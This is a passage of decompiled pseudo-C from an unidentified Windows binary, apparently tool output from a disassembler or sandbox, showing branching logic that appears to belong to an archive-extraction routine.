                                                                                              																		 *_t143 =  *(_t572 + 0x444c) + 1;
                                                                                              																		__eflags =  *_t143;
                                                                                              																		_push(_t613 - 0x2158);
                                                                                              																		_push(_t500);
                                                                                              																		E00407391(_t572);
                                                                                              																		_t502 = 1;
                                                                                              																		goto L84;
                                                                                              																	} else {
                                                                                              																		__eflags = _t379 - 5;
                                                                                              																		if(_t379 == 5) {
                                                                                              																			goto L77;
                                                                                              																		}
                                                                                              																		__eflags =  *((char*)(_t613 + 0xf));
                                                                                              																		if( *((char*)(_t613 + 0xf)) == 0) {
                                                                                              																			L90:
                                                                                              																			_t611 =  *((intOrPtr*)(_t613 - 0x24));
                                                                                              																			L91:
                                                                                              																			__eflags =  *((char*)(_t500 + 0xb054));
                                                                                              																			if( *((char*)(_t500 + 0xb054)) == 0) {
                                                                                              																				__eflags =  *((char*)(_t613 + 0xf));
                                                                                              																				if( *((char*)(_t613 + 0xf)) == 0) {
                                                                                              																					L184:
                                                                                              																					 *(_t613 - 4) = 0;
                                                                                              																					E00408C7D(_t500, _t613 - 0x1158);
                                                                                              																					 *(_t613 - 4) =  *(_t613 - 4) | 0xffffffff;
                                                                                              																					E0040D111(_t613 - 0x134);
                                                                                              																					__eflags =  *(_t613 - 0xe);
                                                                                              																					if( *(_t613 - 0xe) != 0) {
                                                                                              																						_t333 = _t611 + 0x4454;
                                                                                              																						 *_t333 =  *(_t611 + 0x4454) + 1;
                                                                                              																						__eflags =  *_t333;
                                                                                              																					}
                                                                                              																					L186:
                                                                                              																					_t383 =  *((intOrPtr*)(_t613 - 0x24));
                                                                                              																					__eflags =  *((char*)(_t383 + 0x21d8));
                                                                                              																					if( *((char*)(_t383 + 0x21d8)) != 0) {
                                                                                              																						goto L191;
                                                                                              																					}
                                                                                              																					__eflags =  *((char*)(_t613 + 0xf));
                                                                                              																					if( *((char*)(_t613 + 0xf)) != 0) {
                                                                                              																						L14:
                                                                                              																						_t364 = 1;
                                                                                              																						goto L15;
                                                                                              																					}
                                                                                              																					__eflags =  *((char*)(_t500 + 0xb054));
                                                                                              																					if( *((char*)(_t500 + 0xb054)) != 0) {
                                                                                              																						__eflags =  *((char*)(_t613 - 0x1d));
                                                                                              																						if( *((char*)(_t613 - 0x1d)) != 0) {
                                                                                              																							goto L14;
                                                                                              																						}
                                                                                              																						goto L191;
                                                                                              																					}
                                                                                              																					L189:
                                                                                              																					E004010C0(_t500);
                                                                                              																					goto L14;
                                                                                              																				}
                                                                                              																				L95:
                                                                                              																				_t386 =  *((intOrPtr*)(_t611 + 8)) + 0x51c1;
                                                                                              																				__eflags =  *_t386;
                                                                                              																				if( *_t386 == 0) {
                                                                                              																					L97:
                                                                                              																					__eflags =  *((char*)(_t613 - 0x1d));
                                                                                              																					if( *((char*)(_t613 - 0x1d)) != 0) {
                                                                                              																						L125:
                                                                                              																						__eflags =  *((char*)(_t613 - 0x1d));
                                                                                              																						 *((char*)(_t613 - 0xf)) = 1;
                                                                                              																						if( *((char*)(_t613 - 0x1d)) != 0) {
                                                                                              																							L102:
                                                                                              																							 *((intOrPtr*)(_t611 + 0x4450)) =  *((intOrPtr*)(_t611 + 0x4450)) + 1;
                                                                                              																							 *((intOrPtr*)(_t611 + 0x21f8)) = 0;
                                                                                              																							 *((intOrPtr*)(_t611 + 0x21fc)) = 0;
                                                                                              																							 *((intOrPtr*)(_t611 + 0x2200)) = 0;
                                                                                              																							 *((intOrPtr*)(_t611 + 0x2204)) = 0;
                                                                                              																							E00409885(_t611 + 0x38e0,  *((intOrPtr*)(_t500 + 0x7648)),  *((intOrPtr*)( *((intOrPtr*)(_t611 + 8)) + 0x7298)));
                                                                                              																							E00409885(_t611 + 0x2218,  *((intOrPtr*)(_t500 + 0x7648)),  *((intOrPtr*)( *((intOrPtr*)(_t611 + 8)) + 0x7298)));
                                                                                              																							 *(_t611 + 0x30) =  *(_t500 + 0x7630);
                                                                                              																							 *(_t611 + 0x34) =  *(_t500 + 0x7634);
                                                                                              																							E0040B863( *((intOrPtr*)(_t613 - 0x28)), _t500, _t613 - 0x1158);
                                                                                              																							_t395 =  *((intOrPtr*)(_t613 - 0xf));
                                                                                              																							 *(_t611 + 0x39) = _t395;
                                                                                              																							 *((char*)(_t611 + 0x3a)) =  *((intOrPtr*)(_t613 - 0x1d));
                                                                                              																							__eflags = _t395;
                                                                                              																							if(_t395 != 0) {
                                                                                              																								L114:
                                                                                              																								_t531 =  *((intOrPtr*)(_t611 + 8));
                                                                                              																								 *((char*)( *((intOrPtr*)(_t611 + 8)) + 0x5194)) =  *((char*)(_t613 - 0xf));
                                                                                              																								 *((char*)(_t613 - 0x1145)) = _t395 & 0xffffff00 |  *((char*)( *((intOrPtr*)(_t611 + 8)) + 0x5194)) == 0x00000000;
                                                                                              																								if( *((char*)(_t613 - 0xf)) != 0) {
                                                                                              																									L117:
                                                                                              																									 *((char*)(_t613 - 0xd)) = 0;
                                                                                              																									L118:
                                                                                              																									__eflags =  *((char*)(_t613 - 0x11));
                                                                                              																									 *((char*)(_t613 - 0x19)) = 1;
                                                                                              																									 *((char*)(_t613 + 0xb)) = 1;
                                                                                              																									if( *((char*)(_t613 - 0x11)) == 0) {
                                                                                              																										__eflags =  *((char*)(_t500 + 0x7670));
                                                                                              																										if( *((char*)(_t500 + 0x7670)) == 0) {
                                                                                              																											__eflags =  *((char*)(_t500 + 0x6602));
                                                                                              																											if(__eflags != 0) {
                                                                                              																												_push( *(_t500 + 0x76c8) & 0x000000ff);
                                                                                              																												_push( *((intOrPtr*)(_t500 + 0x76cc)));
                                                                                              																												E004126F0( *((intOrPtr*)(_t611 + 0x4448))); // executed
                                                                                              																												_t426 =  *((intOrPtr*)(_t611 + 0x4448));
                                                                                              																												_t590 =  *(_t500 + 0x763c);
                                                                                              																												 *(_t426 + 0x4c40) =  *(_t500 + 0x7638);
                                                                                              																												 *(_t426 + 0x4c44) =  *(_t500 + 0x763c);
                                                                                              																												 *((char*)(_t426 + 0x4c58)) = 0;
                                                                                              																												E00418AFF( *((intOrPtr*)(_t611 + 0x4448)),  *(_t500 + 0x6601) & 0x000000ff,  *(_t500 + 0x76c8) & 0x000000ff); // executed
                                                                                              																											} else {
                                                                                              																												_push( *(_t500 + 0x763c));
                                                                                              																												_push( *(_t500 + 0x7638));
                                                                                              																												_push( *((intOrPtr*)(_t613 - 0x28)));
                                                                                              																												E004071DF(_t590, __eflags);
                                                                                              																											}
                                                                                              																										}
                                                                                              																										L147:
                                                                                              																										E004010C0(_t500);
                                                                                              																										__eflags =  *((char*)(_t500 + 0x7671));
                                                                                              																										if(__eflags != 0) {
                                                                                              																											L150:
                                                                                              																											_t398 = 0;
                                                                                              																											__eflags = 0;
                                                                                              																											L151:
                                                                                              																											__eflags =  *(_t500 + 0x76c8);
                                                                                              																											if( *(_t500 + 0x76c8) != 0) {
                                                                                              																												__eflags =  *((char*)(_t500 + 0x6602));
                                                                                              																												if( *((char*)(_t500 + 0x6602)) == 0) {
                                                                                              																													L159:
                                                                                              																													__eflags =  *((char*)(_t613 - 0x1d));
                                                                                              																													 *((char*)(_t613 - 0xd)) = 0;
                                                                                              																													if( *((char*)(_t613 - 0x1d)) != 0) {
                                                                                              																														L169:
                                                                                              																														__eflags =  *((char*)(_t613 - 0xf));
                                                                                              																														if( *((char*)(_t613 - 0xf)) != 0) {
                                                                                              																															goto L184;
                                                                                              																														}
                                                                                              																														__eflags =  *(_t613 - 0x18) - 0x58;
                                                                                              																														if( *(_t613 - 0x18) == 0x58) {
                                                                                              																															L172:
                                                                                              																															__eflags =  *((char*)(_t613 - 0x11));
                                                                                              																															if( *((char*)(_t613 - 0x11)) == 0) {
                                                                                              																																L175:
                                                                                              																																__eflags =  *((char*)(_t613 - 0xd));
                                                                                              																																if( *((char*)(_t613 - 0xd)) == 0) {
                                                                                              																																	L178:
                                                                                              																																	_t399 =  *((intOrPtr*)(_t611 + 8));
                                                                                              																																	__eflags =  *((char*)(_t399 + 0x5150));
                                                                                              																																	if( *((char*)(_t399 + 0x5150)) != 0) {
                                                                                              																																		_t304 = _t500 + 0x6604;
                                                                                              																																		 *_t304 =  *(_t500 + 0x6604) & 0xffffffdf;
                                                                                              																																		__eflags =  *_t304;
                                                                                              																																	}
                                                                                              																																	asm("sbb ecx, ecx");
                                                                                              																																	asm("sbb ecx, ecx");
                                                                                              																																	asm("sbb ecx, ecx");
                                                                                              																																	E00408D35(_t613 - 0x1158,  ~( *( *((intOrPtr*)(_t611 + 8)) + 0x628c)) & _t500 + 0x00007618,  ~( *( *((intOrPtr*)(_t611 + 8)) + 0x6290)) & _t500 + 0x00007620,  ~( *( *((intOrPtr*)(_t611 + 8)) + 0x6294)) & _t500 + 0x00007628);
                                                                                              																																	E00408A32(_t613 - 0x1158);
                                                                                              																																	asm("sbb ecx, ecx");
                                                                                              																																	asm("sbb ecx, ecx");
                                                                                              																																	E00408C57(_t500 + 0x7618,  ~( *( *((intOrPtr*)(_t611 + 8)) + 0x628c)) & _t500 + 0x00007618,  ~( *( *((intOrPtr*)(_t611 + 8)) + 0x6294)) & _t500 + 0x00007628);
                                                                                              																																	_t407 =  *((intOrPtr*)(_t611 + 8));
                                                                                              																																	__eflags =  *((char*)(_t407 + 0x519b));
                                                                                              																																	if( *((char*)(_t407 + 0x519b)) == 0) {
                                                                                              																																		_t409 = E0040908D(_t613 - 0x113a,  *(_t500 + 0x6604));
                                                                                              																																		__eflags = _t409;
                                                                                              																																		if(_t409 == 0) {
                                                                                              																																			E0040639F(0x10, _t500 + 0x1e, _t613 - 0x113a);
                                                                                              																																		}
                                                                                              																																	}
                                                                                              																																	 *((char*)(_t611 + 0x545d)) = 1;
                                                                                              																																	goto L184;
                                                                                              																																}
                                                                                              																																_t413 =  *((intOrPtr*)(_t611 + 8));
                                                                                              																																__eflags =  *((char*)(_t413 + 0x5194));
                                                                                              																																if( *((char*)(_t413 + 0x5194)) == 0) {
                                                                                              																																	goto L184;
                                                                                              																																}
                                                                                              																																E00408C47(_t613 - 0x1158);
                                                                                              																																goto L178;
                                                                                              																															}
                                                                                              																															__eflags =  *(_t500 + 0x76d8) - 5;
                                                                                              																															if( *(_t500 + 0x76d8) != 5) {
                                                                                              																																goto L184;
                                                                                              																															}
                                                                                              																															__eflags =  *((char*)(_t613 + 0xb));
                                                                                              																															if( *((char*)(_t613 + 0xb)) == 0) {
                                                                                              																																goto L184;
                                                                                              																															}
                                                                                              																															goto L175;
                                                                                              																														}
                                                                                              																														__eflags =  *(_t613 - 0x18) - 0x45;
                                                                                              																														if( *(_t613 - 0x18) != 0x45) {
                                                                                              																															goto L184;
                                                                                              																														}
                                                                                              																														goto L172;
                                                                                              																													}
                                                                                              																													__eflags =  *((char*)(_t613 - 0x19));
                                                                                              																													if( *((char*)(_t613 - 0x19)) == 0) {
                                                                                              																														goto L169;
                                                                                              																													}
                                                                                              																													__eflags = _t398;
                                                                                              																													if(_t398 != 0) {
                                                                                              																														goto L169;
                                                                                              																													}
                                                                                              																													__eflags =  *((intOrPtr*)(_t500 + 0x7673)) - _t398;
                                                                                              																													if( *((intOrPtr*)(_t500 + 0x7673)) == _t398) {
                                                                                              																														L167:
                                                                                              																														_push(_t613 - 0x2158);
                                                                                              																														_push(_t500 + 0x1e);
                                                                                              																														_push(3);
                                                                                              																														L168:
                                                                                              																														E0040639F();
                                                                                              																														 *((char*)(_t613 - 0xd)) = 1;
                                                                                              																														E004062BA(0x4335ac, 3);
                                                                                              																														goto L169;
                                                                                              																													}
                                                                                              																													__eflags =  *((intOrPtr*)(_t500 + 0x7699)) - _t398;
                                                                                              																													if( *((intOrPtr*)(_t500 + 0x7699)) == _t398) {
                                                                                              																														L165:
                                                                                              																														__eflags =  *((char*)(_t611 + 0x445b));
                                                                                              																														if( *((char*)(_t611 + 0x445b)) != 0) {
                                                                                              																															goto L167;
                                                                                              																														}
                                                                                              																														_push(_t613 - 0x2158);
                                                                                              																														_push(_t500 + 0x1e);
                                                                                              																														_push(4);
                                                                                              																														goto L168;
                                                                                              																													}
                                                                                              																													__eflags =  *((intOrPtr*)(_t500 + 0xb064)) - _t398;
                                                                                              																													if( *((intOrPtr*)(_t500 + 0xb064)) == _t398) {
                                                                                              																														goto L167;
                                                                                              																													}
                                                                                              																													goto L165;
                                                                                              																												}
                                                                                              																												__eflags =  *(_t500 + 0x763c);
                                                                                              																												if(__eflags < 0) {
                                                                                              																													goto L159;
                                                                                              																												}
                                                                                              																												if(__eflags > 0) {
                                                                                              																													L157:
                                                                                              																													__eflags = _t398;
                                                                                              																													if(_t398 != 0) {
                                                                                              																														 *((char*)(_t611 + 0x445b)) = 1;
                                                                                              																													}
                                                                                              																													goto L159;
                                                                                              																												}
                                                                                              																												__eflags =  *(_t500 + 0x7638);
                                                                                              																												if( *(_t500 + 0x7638) <= 0) {
                                                                                              																													goto L159;
                                                                                              																												}
                                                                                              																												goto L157;
                                                                                              																											}
                                                                                              																											 *((char*)(_t611 + 0x445b)) = 0;
                                                                                              																											goto L159;
                                                                                              																										}
                                                                                              																										asm("sbb ecx, ecx");
                                                                                              																										_t423 = E00409AE9(_t500, _t611 + 0x38e0, _t590, __eflags, _t500 + 0x7648,  ~( *(_t500 + 0x76a2) & 0x000000ff) & _t500 + 0x000076a3);
                                                                                              																										__eflags = _t423;
                                                                                              																										if(_t423 == 0) {
                                                                                              																											goto L150;
                                                                                              																										}
                                                                                              																										_t398 = 1;
                                                                                              																										goto L151;
                                                                                              																									}
                                                                                              																									_t602 =  *(_t500 + 0x76d8);
                                                                                              																									__eflags = _t602 - 4;
                                                                                              																									if(__eflags == 0) {
                                                                                              																										L129:
                                                                                              																										_t560 = _t611;
                                                                                              																										E00406F23(_t611, __eflags, _t500, _t500 + 0x76dc, _t613 - 0x41a0, 0x800);
                                                                                              																										__eflags =  *((char*)(_t613 - 0xd));
                                                                                              																										if( *((char*)(_t613 - 0xd)) == 0) {
                                                                                              																											L135:
                                                                                              																											__eflags =  *((intOrPtr*)(_t500 + 0xb050)) - 2;
                                                                                              																											if( *((intOrPtr*)(_t500 + 0xb050)) != 2) {
                                                                                              																												L138:
                                                                                              																												__eflags =  *((char*)(_t613 - 0xd));
                                                                                              																												if( *((char*)(_t613 - 0xd)) == 0) {
                                                                                              																													L141:
                                                                                              																													_t434 = 0;
                                                                                              																													__eflags = 0;
                                                                                              																													L142:
                                                                                              																													 *((char*)(_t611 + 0x545d)) = _t434;
                                                                                              																													goto L147;
                                                                                              																												}
                                                                                              																												L139:
                                                                                              																												__eflags =  *((char*)(_t613 + 0xb));
                                                                                              																												if( *((char*)(_t613 + 0xb)) == 0) {
                                                                                              																													goto L141;
                                                                                              																												}
                                                                                              																												_t434 = 1;
                                                                                              																												goto L142;
                                                                                              																											}
                                                                                              																											__eflags =  *((char*)(_t613 - 0xd));
                                                                                              																											if( *((char*)(_t613 - 0xd)) != 0) {
                                                                                              																												goto L139;
                                                                                              																											}
                                                                                              																											L137:
                                                                                              																											 *((char*)(_t613 - 0x19)) = 0;
                                                                                              																											goto L138;
                                                                                              																										}
                                                                                              																										__eflags =  *((short*)(_t613 - 0x41a0));
                                                                                              																										if( *((short*)(_t613 - 0x41a0)) == 0) {
                                                                                              																											goto L135;
                                                                                              																										}
                                                                                              																										_push(0x800);
                                                                                              																										_push(_t613 - 0x41a0);
                                                                                              																										_push(_t611 + 0x545e);
                                                                                              																										__eflags = _t602 - 4;
                                                                                              																										if(__eflags != 0) {
                                                                                              																											_push(_t500 + 0x1e);
                                                                                              																											_push(_t613 - 0x1158);
                                                                                              																											_t440 = E00407276(_t590, _t602, __eflags);
                                                                                              																										} else {
                                                                                              																											_t440 = E0040677F(_t560, _t602, __eflags);
                                                                                              																										}
                                                                                              																										L134:
                                                                                              																										 *((char*)(_t613 + 0xb)) = _t440;
                                                                                              																										__eflags = _t440;
                                                                                              																										if(_t440 == 0) {
                                                                                              																											goto L137;
                                                                                              																										}
                                                                                              																										goto L135;
                                                                                              																									}
                                                                                              																									__eflags = _t602 - 5;
                                                                                              																									if(__eflags == 0) {
                                                                                              																										goto L129;
                                                                                              																									}
                                                                                              																									__eflags = _t602 - 1;
                                                                                              																									if(_t602 == 1) {
                                                                                              																										L127:
                                                                                              																										__eflags =  *((char*)(_t613 - 0xd));
                                                                                              																										if( *((char*)(_t613 - 0xd)) == 0) {
                                                                                              																											goto L135;
                                                                                              																										}
                                                                                              																										_push(_t611 + 0x545e);
                                                                                              																										_t440 = E00406CDB(_t531,  *((intOrPtr*)(_t613 - 0x28)), _t500);
                                                                                              																										goto L134;
                                                                                              																									}
                                                                                              																									__eflags = _t602 - 2;
                                                                                              																									if(_t602 == 2) {
                                                                                              																										goto L127;
                                                                                              																									}
                                                                                              																									__eflags = _t602 - 3;
                                                                                              																									if(_t602 == 3) {
                                                                                              																										goto L127;
                                                                                              																									}
                                                                                              																									E0040639F(0x46, _t500 + 0x1e, _t611 + 0x545e);
                                                                                              																									 *((char*)(_t613 + 0xb)) = 0;
                                                                                              																									goto L137;
                                                                                              																								}
                                                                                              																								__eflags =  *((char*)(_t613 - 0x1d));
                                                                                              																								if( *((char*)(_t613 - 0x1d)) != 0) {
                                                                                              																									goto L117;
                                                                                              																								}
                                                                                              																								__eflags =  *(_t613 - 0x18) - 0x50;
                                                                                              																								 *((char*)(_t613 - 0xd)) = 1;
                                                                                              																								if( *(_t613 - 0x18) != 0x50) {
                                                                                              																									goto L118;
                                                                                              																								}
                                                                                              																								goto L117;
                                                                                              																							}
                                                                                              																							__eflags =  *((intOrPtr*)(_t500 + 0xb064)) - _t395;
                                                                                              																							if( *((intOrPtr*)(_t500 + 0xb064)) != _t395) {
                                                                                              																								goto L114;
                                                                                              																							}
                                                                                              																							_t445 =  *(_t500 + 0x7630);
                                                                                              																							_t590 =  *(_t500 + 0x763c);
                                                                                              																							_t603 =  *(_t500 + 0x7638);
                                                                                              																							_t395 = _t445 << 0xb;
                                                                                              																							__eflags = ( *(_t500 + 0x7634) << 0x00000020 | _t445) << 0xb - _t590;
                                                                                              																							if(__eflags < 0) {
                                                                                              																								goto L114;
                                                                                              																							}
                                                                                              																							if(__eflags > 0) {
                                                                                              																								L107:
                                                                                              																								__eflags = _t590;
                                                                                              																								if(__eflags < 0) {
                                                                                              																									L113:
                                                                                              																									_t395 = E00408FBF(_t613 - 0x1158,  *(_t500 + 0x7638),  *(_t500 + 0x763c));
                                                                                              																									goto L114;
                                                                                              																								}
                                                                                              																								if(__eflags > 0) {
                                                                                              																									L110:
                                                                                              																									_t395 = E00408E03(_t500, _t590);
                                                                                              																									__eflags = _t590 -  *(_t500 + 0x7634);
                                                                                              																									if(__eflags < 0) {
                                                                                              																										goto L114;
                                                                                              																									}
                                                                                              																									if(__eflags > 0) {
                                                                                              																										goto L113;
                                                                                              																									}
                                                                                              																									__eflags = _t395 -  *(_t500 + 0x7630);
                                                                                              																									if(_t395 <=  *(_t500 + 0x7630)) {
                                                                                              																										goto L114;
                                                                                              																									}
                                                                                              																									goto L113;
                                                                                              																								}
                                                                                              																								__eflags = _t603 - 0x5f5e100;
                                                                                              																								if(_t603 < 0x5f5e100) {
                                                                                              																									goto L113;
                                                                                              																								}
                                                                                              																								goto L110;
                                                                                              																							}
                                                                                              																							__eflags = _t395 - _t603;
                                                                                              																							if(_t395 <= _t603) {
                                                                                              																								goto L114;
                                                                                              																							}
                                                                                              																							goto L107;
                                                                                              																						}
                                                                                              																						L101:
                                                                                              																						_t176 = _t611 + 0x444c;
                                                                                              																						 *_t176 =  *(_t611 + 0x444c) + 1;
                                                                                              																						__eflags =  *_t176;
                                                                                              																						goto L102;
                                                                                              																					}
                                                                                              																					__eflags =  *(_t613 - 0x18) - 0x50;
                                                                                              																					 *((char*)(_t613 - 0xf)) = 0;
                                                                                              																					if( *(_t613 - 0x18) != 0x50) {
                                                                                              																						_t446 = E00408C5A(_t613 - 0x1158);
                                                                                              																						__eflags = _t446;
                                                                                              																						if(_t446 != 0) {
                                                                                              																							E0040639F(0x3a, _t500 + 0x1e, _t611 + 0x545e);
                                                                                              																							E004064F3(0x4335ac, _t500 + 0x1e, _t611 + 0x545e);
                                                                                              																						}
                                                                                              																					}
                                                                                              																					goto L101;
                                                                                              																				}
                                                                                              																				 *((char*)(_t611 + 0x545d)) = 1;
                                                                                              																				__eflags =  *_t386;
                                                                                              																				if( *_t386 != 0) {
                                                                                              																					goto L125;
                                                                                              																				}
                                                                                              																				goto L97;
                                                                                              																			}
                                                                                              																			 *((char*)(_t613 - 0x1d)) = 1;
                                                                                              																			 *((char*)(_t613 + 0xf)) = 1;
                                                                                              																			_t452 = L004116E5(_t522, _t613 - 0x2158, 0, 0, 1);
                                                                                              																			__eflags = _t452;
                                                                                              																			if(_t452 != 0) {
                                                                                              																				goto L95;
                                                                                              																			}
                                                                                              																			_t502 = 0;
                                                                                              																			L84:
                                                                                              																			 *(_t613 - 4) = 0;
                                                                                              																			E00408C7D(_t502, _t613 - 0x1158);
                                                                                              																			 *(_t613 - 4) =  *(_t613 - 4) | 0xffffffff;
                                                                                              																			E0040D111(_t613 - 0x134);
                                                                                              																			_t364 = _t502;
                                                                                              																			goto L15;
                                                                                              																		}
                                                                                              																		__eflags =  *(_t613 - 0x18) - 0x50;
                                                                                              																		_t611 =  *((intOrPtr*)(_t613 - 0x24));
                                                                                              																		if( *(_t613 - 0x18) == 0x50) {
                                                                                              																			L88:
                                                                                              																			__eflags =  *((char*)(_t613 + 0xf));
                                                                                              																			if( *((char*)(_t613 + 0xf)) != 0) {
                                                                                              																				goto L95;
                                                                                              																			}
                                                                                              																			goto L91;
                                                                                              																		}
                                                                                              																		_t462 =  *((intOrPtr*)(_t611 + 8));
                                                                                              																		__eflags =  *((char*)(_t462 + 0x51c1));
                                                                                              																		if( *((char*)(_t462 + 0x51c1)) != 0) {
                                                                                              																			goto L88;
                                                                                              																		}
                                                                                              																		_t605 = _t611 + 0x545e;
                                                                                              																		 *((char*)(_t613 + 0xb)) = 0;
                                                                                              																		_t463 = E004092A5(_t611 + 0x545e);
                                                                                              																		__eflags = _t463;
                                                                                              																		if(_t463 == 0) {
                                                                                              																			L75:
                                                                                              																			__eflags =  *((char*)(_t613 + 0xb));
                                                                                              																			if( *((char*)(_t613 + 0xb)) == 0) {
                                                                                              																				goto L88;
                                                                                              																			}
                                                                                              																			L76:
                                                                                              																			 *((char*)(_t613 + 0xf)) = 0;
                                                                                              																			goto L88;
                                                                                              																		}
                                                                                              																		__eflags =  *((char*)(_t613 + 0xb));
                                                                                              																		if( *((char*)(_t613 + 0xb)) != 0) {
                                                                                              																			goto L76;
                                                                                              																		}
                                                                                              																		E004086BE( *((intOrPtr*)(_t611 + 8)), 0, _t605, 0x800, _t613 + 0xb,  *(_t500 + 0x7638),  *(_t500 + 0x763c), _t500 + 0x7618, 0);
                                                                                              																		goto L75;
                                                                                              																	}
                                                                                              																}
                                                                                              																_t475 = E0040733E(_t607, _t500, _t613 - 0x2158);
                                                                                              																__eflags = _t475;
                                                                                              																if(_t475 != 0) {
                                                                                              																	_t476 =  *((intOrPtr*)(_t607 + 8));
                                                                                              																	__eflags =  *((char*)(_t476 + 0x4124));
                                                                                              																	if( *((char*)(_t476 + 0x4124)) == 0) {
                                                                                              																		E004062BA(0x4335ac, 1);
                                                                                              																		 *((char*)(_t613 + 0xf)) = 0;
                                                                                              																	}
                                                                                              																	goto L60;
                                                                                              																}
                                                                                              																 *((char*)(_t607 + 0x645e)) = 1;
                                                                                              																goto L191;
                                                                                              															}
                                                                                              															L54:
                                                                                              															 *((char*)(_t613 + 0xf)) = 0;
                                                                                              															goto L55;
                                                                                              														}
                                                                                              														_t479 = E00407048(_t613 - 0x2190, _t500 + 0x7618);
                                                                                              														__eflags = _t479;
                                                                                              														if(_t479 == 0) {
                                                                                              															goto L55;
                                                                                              														}
                                                                                              														__eflags =  *((char*)(_t613 - 0x2194));
                                                                                              														if( *((char*)(_t613 - 0x2194)) == 0) {
                                                                                              															goto L54;
                                                                                              														} else {
                                                                                              															__eflags = E0040702A(_t613 - 0x2190, _t607);
                                                                                              															goto L53;
                                                                                              														}
                                                                                              													}
                                                                                              													__eflags =  *(_t613 - 0x18) - 0x58;
                                                                                              													if( *(_t613 - 0x18) != 0x58) {
                                                                                              														goto L55;
                                                                                              													}
                                                                                              													goto L48;
                                                                                              												}
                                                                                              												__eflags =  *((char*)(_t367 + 0x5154));
                                                                                              												if( *((char*)(_t367 + 0x5154)) == 0) {
                                                                                              													goto L55;
                                                                                              												}
                                                                                              												goto L46;
                                                                                              											}
                                                                                              											__eflags =  *_t595;
                                                                                              											if( *_t595 == 0) {
                                                                                              												goto L43;
                                                                                              											}
                                                                                              											__eflags =  *((char*)(_t500 + 0x7670));
                                                                                              											 *((char*)(_t613 + 0xf)) = 1;
                                                                                              											if( *((char*)(_t500 + 0x7670)) == 0) {
                                                                                              												goto L44;
                                                                                              											}
                                                                                              											goto L43;
                                                                                              										}
                                                                                              										__eflags =  *(_t613 - 0x18) - 0x49;
                                                                                              										if( *(_t613 - 0x18) == 0x49) {
                                                                                              											goto L38;
                                                                                              										} else {
                                                                                              											_t510 = 1;
                                                                                              											goto L39;
                                                                                              										}
                                                                                              									}
                                                                                              									_t481 =  *((intOrPtr*)(_t500 + 0xb054));
                                                                                              									 *((char*)(_t613 - 0x1d)) = _t481;
                                                                                              									__eflags = _t481;
                                                                                              									if(_t481 == 0) {
                                                                                              										goto L186;
                                                                                              									}
                                                                                              									goto L35;
                                                                                              								}
                                                                                              								_t482 =  *((intOrPtr*)(_t607 + 8));
                                                                                              								__eflags =  *((intOrPtr*)(_t482 + 0x6284)) - 1;
                                                                                              								if( *((intOrPtr*)(_t482 + 0x6284)) <= 1) {
                                                                                              									goto L33;
                                                                                              								}
                                                                                              								L32:
                                                                                              								 *(_t613 - 0xe) = 0;
                                                                                              								goto L33;
                                                                                              							}
                                                                                              							_t484 =  *( *((intOrPtr*)(_t607 + 8)) + 0x6284);
                                                                                              							__eflags = _t484 - 1;
                                                                                              							if(_t484 == 1) {
                                                                                              								goto L33;
                                                                                              							}
                                                                                              							__eflags =  *((char*)(_t613 - 0x10));
                                                                                              							if( *((char*)(_t613 - 0x10)) != 0) {
                                                                                              								goto L33;
                                                                                              							} else {
                                                                                              								__eflags = _t484;
                                                                                              								if(__eflags == 0) {
                                                                                              									 *(_t613 - 0xe) = _t484;
                                                                                              								}
                                                                                              								_push(0);
                                                                                              								__eflags =  *( *((intOrPtr*)(_t607 + 8)) + 0x6284) - 1 - E0040A351(_t613, __eflags, _t613 - 0x2158);
                                                                                              								if(__eflags != 0) {
                                                                                              									goto L32;
                                                                                              								} else {
                                                                                              									_push(1);
                                                                                              									E0040A351(_t613, __eflags, _t613 - 0x2158);
                                                                                              									goto L33;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						__eflags =  *((intOrPtr*)(_t607 + 0x4454)) -  *((intOrPtr*)(_t504 + 0x92e8));
                                                                                              						if( *((intOrPtr*)(_t607 + 0x4454)) <  *((intOrPtr*)(_t504 + 0x92e8))) {
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						__eflags =  *((char*)(_t607 + 0x4459));
                                                                                              						if( *((char*)(_t607 + 0x4459)) != 0) {
                                                                                              							goto L191;
                                                                                              						}
                                                                                              						goto L20;
                                                                                              					}
                                                                                              					__eflags = _t593 - 3;
                                                                                              					if(_t593 != 3) {
                                                                                              						L9:
                                                                                              						__eflags = _t593 - 5;
                                                                                              						if(_t593 != 5) {
                                                                                              							goto L189;
                                                                                              						}
                                                                                              						__eflags =  *((char*)(_t500 + 0x8904));
                                                                                              						if( *((char*)(_t500 + 0x8904)) == 0) {
                                                                                              							goto L191;
                                                                                              						}
                                                                                              						_t490 = E00418B3D(_t585, _t500, _t607 + 0x10, 0,  *(_t613 - 0x18));
                                                                                              						__eflags = _t490;
                                                                                              						if(_t490 != 0) {
                                                                                              							 *((intOrPtr*)( *_t500 + 0xc))( *((intOrPtr*)(_t500 + 0xb040)),  *((intOrPtr*)(_t500 + 0xb044)), 0);
                                                                                              							goto L14;
                                                                                              						} else {
                                                                                              							E004062BA(0x4335ac, 1);
                                                                                              							goto L191;
                                                                                              						}
                                                                                              					}
                                                                                              					__eflags =  *((char*)(_t607 + 0x545d));
                                                                                              					if( *((char*)(_t607 + 0x545d)) == 0) {
                                                                                              						goto L189;
                                                                                              					} else {
                                                                                              						E00406EB8(_t500, _t613,  *((intOrPtr*)(_t607 + 8)), _t500, _t607 + 0x545e);
                                                                                              						goto L9;
                                                                                              					}
                                                                                              				}
                                                                                              				if( *((char*)(__ecx + 0x21d7)) == 0) {
                                                                                              					L4:
                                                                                              					_t364 = 0;
                                                                                              					goto L16;
                                                                                              				}
                                                                                              				if(E00418B3D(__edx, _t500, __ecx + 0x10, 0, _t345) != 0) {
                                                                                              					goto L5;
                                                                                              				} else {
                                                                                              					E004062BA(0x4335ac, 1);
                                                                                              					goto L4;
                                                                                              				}
                                                                                              			}

























































                                                                                              0x004076aa
                                                                                              0x004076af
                                                                                              0x004076b9
                                                                                              0x004076c3
                                                                                              0x004076c7
                                                                                              0x004076cc
                                                                                              0x004076d3
                                                                                              0x004076d6
                                                                                              0x004076d9
                                                                                              0x00407708
                                                                                              0x00407709
                                                                                              0x0040770f
                                                                                              0x00407712
                                                                                              0x0040779c
                                                                                              0x0040779f
                                                                                              0x004077a6
                                                                                              0x004077ad
                                                                                              0x004077ca
                                                                                              0x004077e3
                                                                                              0x004077e7
                                                                                              0x004077ec
                                                                                              0x004077ee
                                                                                              0x004077f2
                                                                                              0x004077f6
                                                                                              0x004077f8
                                                                                              0x004077fc
                                                                                              0x004077fe
                                                                                              0x004077fe
                                                                                              0x004077fc
